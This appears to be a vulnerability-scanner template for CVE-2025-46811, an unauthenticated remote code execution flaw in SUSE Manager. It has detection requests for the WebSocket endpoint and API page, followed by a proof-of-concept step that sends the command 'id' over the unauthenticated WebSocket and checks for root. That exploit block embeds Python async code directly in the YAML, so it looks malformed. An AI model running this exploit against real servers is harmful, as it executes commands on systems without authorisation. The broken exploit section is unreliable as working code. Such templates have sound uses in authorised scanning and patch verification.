id: CVE-2025-46811-suse-manager-rce

info:
  name: SUSE Manager Unauthenticated RCE via WebSocket
  author: yourusername
  severity: critical
  description: |
    Missing authentication in SUSE Manager allows unauthenticated remote code execution
    via the /rhn/websocket/minion/remote-commands endpoint
  reference:
    - https://www.suse.com/security/cve/CVE-2025-46811/
  tags: rce,suse,manager,websocket,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/rhn/websocket/minion/remote-commands"
    headers:
      Upgrade: websocket
      Connection: Upgrade
      Origin: {{BaseURL}}
    matchers:
      - type: word
        part: header
        words:
          - "101 Switching Protocols"
        condition: and
      - type: regex
        part: header
        regex:
          - "Sec-WebSocket-Accept:"
    extractors:
      - type: regex
        name: websocket_endpoint
        regex: '(wss?://[^\s]+/rhn/websocket/minion/remote-commands)'

  - method: GET
    path:
      - "{{BaseURL}}/rhn/manager/api"
    matchers:
      - type: word
        words:
          - "SUSE Manager"
          - "API"
        condition: and
      - type: status
        status:
          - 200

rce:
  description: Proof-of-concept command execution
  payloads:
    test_cmd: "id"
  attack: websocket
  steps:
    - |
      async with websockets.connect('{{websocket_endpoint}}', ssl=False) as ws:
          await ws.send('{{test_cmd}}')
          response = await ws.recv()
          if "uid=0(root)" in response:
              return True
  matchers:
    - type: word
      words:
        - "uid=0(root)"